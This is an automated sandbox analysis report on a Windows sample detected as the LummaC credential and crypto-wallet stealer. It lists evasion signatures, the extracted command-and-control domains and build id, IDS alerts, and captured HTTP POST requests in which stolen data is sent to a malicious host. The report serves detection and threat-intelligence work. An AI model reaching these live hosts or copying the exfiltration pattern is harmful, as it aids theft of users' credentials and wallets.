
Windows Analysis Report
random(2).exe

Overview

General Information

Sample name: random(2).exe
Analysis ID: 1629897
MD5: 4c7602a935a7b24e6262acd38505eb9a
SHA1: e1e15c5e8c053eb523ffeb3a24bbe857e41db489
SHA256: 57ccc2313dbc37566c73b42a74283f967d0502a60d276a90afa1dfbee6a74aff
Tags: 176-113-115-7, exe, user-JAMESWT_MHT

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected non-DNS traffic on DNS port
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • random(2).exe (PID: 6644 cmdline: "C:\Users\user\Desktop\random(2).exe" MD5: 4C7602A935A7B24E6262ACD38505EB9A)
  • cleanup
{"C2 url": ["dawtastream.bet", "foresctwhispers.top", "tracnquilforest.life", "collapimga.fun", "seizedsentec.online", "strawpeasaen.fun", "quietswtreams.life", "starrynsightsky.icu"], "Build id": "tw1SlF--"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1546935640.000000000120D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1355119722.000000000120A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1366561400.0000000001207000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-05T09:16:54.955773+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49700 | 104.21.64.1 | 443 | TCP
2025-03-05T09:16:55.745350+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49701 | 104.21.64.1 | 443 | TCP
2025-03-05T09:16:58.994747+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49703 | 104.21.64.1 | 443 | TCP
2025-03-05T09:17:00.218797+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49709 | 104.21.64.1 | 443 | TCP
2025-03-05T09:17:02.544617+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49725 | 104.21.64.1 | 443 | TCP
2025-03-05T09:17:19.514053+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49834 | 104.21.64.1 | 443 | TCP
2025-03-05T09:17:20.952254+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49844 | 104.21.64.1 | 443 | TCP
2025-03-05T09:17:22.981179+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49857 | 104.21.64.1 | 443 | TCP
2025-03-05T09:16:55.204960+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49700 | 104.21.64.1 | 443 | TCP
2025-03-05T09:16:57.213059+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49701 | 104.21.64.1 | 443 | TCP
2025-03-05T09:17:23.479116+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49857 | 104.21.64.1 | 443 | TCP
2025-03-05T09:16:55.204960+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49700 | 104.21.64.1 | 443 | TCP
2025-03-05T09:16:54.955773+0100 | 2060413 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49700 | 104.21.64.1 | 443 | TCP
2025-03-05T09:16:55.745350+0100 | 2060413 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49701 | 104.21.64.1 | 443 | TCP
2025-03-05T09:16:58.994747+0100 | 2060413 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49703 | 104.21.64.1 | 443 | TCP
2025-03-05T09:17:00.218797+0100 | 2060413 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49709 | 104.21.64.1 | 443 | TCP
2025-03-05T09:17:02.544617+0100 | 2060413 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49725 | 104.21.64.1 | 443 | TCP
2025-03-05T09:17:19.514053+0100 | 2060413 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49834 | 104.21.64.1 | 443 | TCP
2025-03-05T09:17:20.952254+0100 | 2060413 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49844 | 104.21.64.1 | 443 | TCP
2025-03-05T09:17:22.981179+0100 | 2060413 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49857 | 104.21.64.1 | 443 | TCP
2025-03-05T09:16:54.124936+0100 | 2060410 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 62223 | 1.1.1.1 | 53 | UDP
2025-03-05T09:16:54.432215+0100 | 2060412 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 62980 | 1.1.1.1 | 53 | UDP
2025-03-05T09:16:54.075836+0100 | 2060414 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 61579 | 1.1.1.1 | 53 | UDP
2025-03-05T09:16:54.396054+0100 | 2060416 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 56090 | 1.1.1.1 | 53 | UDP
2025-03-05T09:16:54.268847+0100 | 2060418 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 57190 | 1.1.1.1 | 53 | UDP
2025-03-05T09:16:54.415778+0100 | 2060420 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 50506 | 1.1.1.1 | 53 | UDP
2025-03-05T09:16:54.372742+0100 | 2060422 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 62349 | 1.1.1.1 | 53 | UDP
2025-03-05T09:16:54.101743+0100 | 2060424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 50023 | 1.1.1.1 | 53 | UDP
2025-03-05T09:16:59.557880+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49703 | 104.21.64.1 | 443 | TCP

AV Detection

Source: random(2).exe | Avira: detected
Source: https://earthsymphzony.today:443/api | Avira URL Cloud: Label: malware
Source: https://earthsymphzony.today/apiEM | Avira URL Cloud: Label: malware
Source: https://earthsymphzony.today/apiV | Avira URL Cloud: Label: malware
Source: https://earthsymphzony.today/a | Avira URL Cloud: Label: malware
Source: https://earthsymphzony.today/m | Avira URL Cloud: Label: malware
Source: https://earthsymphzony.today:443/api& | Avira URL Cloud: Label: malware
Source: https://earthsymphzony.today/api | Avira URL Cloud: Label: malware
Source: https://earthsymphzony.today/b | Avira URL Cloud: Label: malware
Source: https://earthsymphzony.today/ | Avira URL Cloud: Label: malware
Source: https://earthsymphzony.today/api288 | Avira URL Cloud: Label: malware
Source: https://earthsymphzony.today/apij | Avira URL Cloud: Label: malware
Source: https://earthsymphzony.today/a$ | Avira URL Cloud: Label: malware
Source: https://earthsymphzony.today/apiy | Avira URL Cloud: Label: malware
Source: https://earthsymphzony.today/apic | Avira URL Cloud: Label: malware
Source: https://earthsymphzony.today/apix | Avira URL Cloud: Label: malware
Source: dawtastream.bet | Avira URL Cloud: Label: malware
Source: https://earthsymphzony.today/apime | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["dawtastream.bet", "foresctwhispers.top", "tracnquilforest.life", "collapimga.fun", "seizedsentec.online", "strawpeasaen.fun", "quietswtreams.life", "starrynsightsky.icu"], "Build id": "tw1SlF--"}
Source: random(2).exe | Virustotal: Detection: 56%
Source: random(2).exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: dawtastream.bet
Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: foresctwhispers.top
Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: tracnquilforest.life
Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: collapimga.fun
Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: seizedsentec.online
Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: strawpeasaen.fun
Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: quietswtreams.life
Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: starrynsightsky.icu
Source: random(2).exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49725 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49834 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49844 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49857 version: TLS 1.2
Source: C:\Users\user\Desktop\random(2).exe | Directory queried: number of queries: 1001

Networking

Source: Network traffic | Suricata IDS: 2060414 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (foresctwhispers .top) : 192.168.2.7:61579 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2060418 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seizedsentec .online) : 192.168.2.7:57190 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2060410 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (collapimga .fun) : 192.168.2.7:62223 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2060413 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) : 192.168.2.7:49703 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2060413 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) : 192.168.2.7:49709 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2060413 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) : 192.168.2.7:49725 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2060413 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) : 192.168.2.7:49701 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2060412 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (earthsymphzony .today) : 192.168.2.7:62980 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2060424 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tracnquilforest .life) : 192.168.2.7:50023 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2060422 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strawpeasaen .fun) : 192.168.2.7:62349 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2060420 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (starrynsightsky .icu) : 192.168.2.7:50506 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2060416 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (quietswtreams .life) : 192.168.2.7:56090 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2060413 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) : 192.168.2.7:49844 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2060413 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) : 192.168.2.7:49700 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2060413 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) : 192.168.2.7:49857 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2060413 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) : 192.168.2.7:49834 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49703 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49857 -> 104.21.64.1:443
Source: Malware configuration extractor | URLs: dawtastream.bet
Source: Malware configuration extractor | URLs: foresctwhispers.top
Source: Malware configuration extractor | URLs: tracnquilforest.life
Source: Malware configuration extractor | URLs: collapimga.fun
Source: Malware configuration extractor | URLs: seizedsentec.online
Source: Malware configuration extractor | URLs: strawpeasaen.fun
Source: Malware configuration extractor | URLs: quietswtreams.life
Source: Malware configuration extractor | URLs: starrynsightsky.icu
Source: global traffic | TCP traffic: 192.168.2.7:57927 -> 162.159.36.2:53
Source: Joe Sandbox View | IP Address: 104.21.64.1
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49725 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49844 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49857 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49834 -> 104.21.64.1:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: earthsymphzony.today
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 43
    Host: earthsymphzony.today
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=CH331FBUMJ1X
    Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12805
    Host: earthsymphzony.today
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=707WPNS1Q
    Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 6646
    Host: earthsymphzony.today
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=9WX7PLJNJ0A4ZC
    Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20374
    Host: earthsymphzony.today
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=EBABCEGLZ
    Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 2301
    Host: earthsymphzony.today
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=4A1W8BCUKKMJ7AS22F
    Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 584009
    Host: earthsymphzony.today
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 77
    Host: earthsymphzony.today
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: dawtastream.bet
Source: global traffic | DNS traffic detected: DNS query: foresctwhispers.top
Source: global traffic | DNS traffic detected: DNS query: tracnquilforest.life
Source: global traffic | DNS traffic detected: DNS query: collapimga.fun
Source: global traffic | DNS traffic detected: DNS query: seizedsentec.online
Source: global traffic | DNS traffic detected: DNS query: strawpeasaen.fun
Source: global traffic | DNS traffic detected: DNS query: quietswtreams.life
Source: global traffic | DNS traffic detected: DNS query: starrynsightsky.icu
Source: global traffic | DNS traffic detected: DNS query: earthsymphzony.today
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: earthsymphzony.today
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Wed, 05 Mar 2025 08:16:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2BpIJ7uHiYcbFeSVzk5TM%2FSWipGNSxmX95z2h%2B0awfae1lON3g7XOHooiqwUXW0mqL%2FaMu2z0oZz%2BnaZKZAGPCQ%2FVfq9wwEFSrSXBXyc5NbNEaqIYuFIMJojFSU98pKzObnRFOMXKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 91b82c88ab50c358-EWR
Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.dr | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.dr | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.dr | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.dr | String found in binary or memory: http://x1.c.lencr.org/0
Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.dr | String found in binary or memory: http://x1.i.lencr.org/0
Source: random(2).exe, 00000000.00000003.1342785210.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: random(2).exe, 00000000.00000003.1557258128.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558684542.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567247573.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1597998557.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sf
Source: random(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542364026.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: random(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542748938.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546836990.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: random(2).exe, 00000000.00000003.1342785210.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: random(2).exe, 00000000.00000003.1342785210.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
